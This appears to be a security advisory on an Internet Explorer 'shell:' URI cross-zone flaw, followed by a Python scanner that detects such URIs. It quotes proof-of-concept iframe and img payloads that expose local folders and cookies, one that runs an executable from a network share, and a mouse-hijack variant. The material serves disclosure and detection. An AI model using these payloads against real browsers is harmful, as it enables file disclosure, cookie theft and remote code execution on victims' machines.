Microsoft Internet Explorer Shell: IFrame Cross-Zone Scripting Vulnerability
The following proof-of-concept has been provided:

    <iframe src="shell:my music"/>

Roozbeh Afrasiabi <roozbeh_afrasiabi@yahoo.com> has provided the following proofs of concept, including DiscloseNFO (IE 6+ 6SP1) and ReadCookies (IE6):

    <iframe id="Target" src='shell:windows' name="x" width="875" height="527"> </iframe>
    <iframe id="Target" src='shell:windows\system32\config\' name="x" width="875" height="527"> </iframe>
    <iframe id="Target" src='shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}' name="x" width="875" height="527"> </iframe>
    <iframe id="Target" src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:' name="x" width="875" height="527"> </iframe>
    <iframe id="Target" src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}' name="x" width="875" height="527"> </iframe>
    <iframe id="Target" src='{E773F1AF-3A65-4866-857D-846FC9C4598A}' name="x" width="875" height="527"> </iframe>
    <a target="_blank" href="shell:::{3E9BAF2D-7A79-11d2-9334-0000F875AE17}">click</a>

Additional proofs of concept were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

Liu Die Yu has supplied a proof of concept for a 'shell:' URI remote file execution vector:

1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p". THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD"

2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE "shared" FOLDER:

    <IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">

A variant of the proof of concept of the exploit listed in BID 10690 (Microsoft Internet Explorer Popup.show Mouse Event Hijacking Vulnerability) has been supplied by http-equiv. Just substitute the following:

1.
    <img src="greyhat.html" id=anch onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height= 2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert ()',3000);" style="width=168px;height=152px;background-image:url ('youlickit.gif');cursor:hand" title="click me!"></a>

2.
    location="shell:favorites\\greyhat[1].htm"

An additional proof-of-concept was released by http-equiv that demonstrates a method of using this issue in addition to BID 10517 to install an executable on a victim system:

http://www.malware.com/wattadrag.html
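
For detection, the samples above share one trait: a 'shell:' URI reaches the browser through a URL-bearing attribute (iframe/img src, a href) or a script assignment to location. The Python scanner below is an added example, not part of the original advisory or of any vendor tooling; the names ShellUriScanner and scan, the attribute list and the sample page are assumptions made for this example.

```python
import re
from html.parser import HTMLParser

# Attributes that make a browser load or navigate to a URL.
URL_ATTRS = {"src", "href", "background", "data", "action"}
# URI schemes are case-insensitive; leading whitespace is ignored by browsers.
SHELL_URI = re.compile(r"^\s*shell:", re.IGNORECASE)
# Script navigation such as location="shell:..." in handlers or <script> text.
SCRIPT_NAV = re.compile(r"""location(?:\.href)?\s*=\s*["']\s*shell:""", re.I)

class ShellUriScanner(HTMLParser):
    """Collects (line, tag, where, value) for each 'shell:' reference."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self._in_script = tag == "script"
        line = self.getpos()[0]
        for name, value in attrs:
            if not value:
                continue
            # HTMLParser has already decoded character references here.
            in_url = name in URL_ATTRS and SHELL_URI.match(value)
            in_handler = name.startswith("on") and SCRIPT_NAV.search(value)
            if in_url or in_handler:
                self.findings.append((line, tag, name, value.strip()))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and SCRIPT_NAV.search(data):
            self.findings.append((self.getpos()[0], "script", "text", data.strip()))

def scan(html):
    scanner = ShellUriScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page; the 'shell:' values are ones quoted in the advisory.
SAMPLE = r"""<html><body>
<iframe src="shell:my music"></iframe>
<a href="https://example.com/shell:help">benign</a>
<img src="SHELL:windows">
<script>location="shell:favorites\\greyhat[1].htm"</script></body></html>"""
```

Calling scan(SAMPLE) returns one finding each for the iframe, the img and the script assignment, and nothing for the benign link whose path merely contains "shell:".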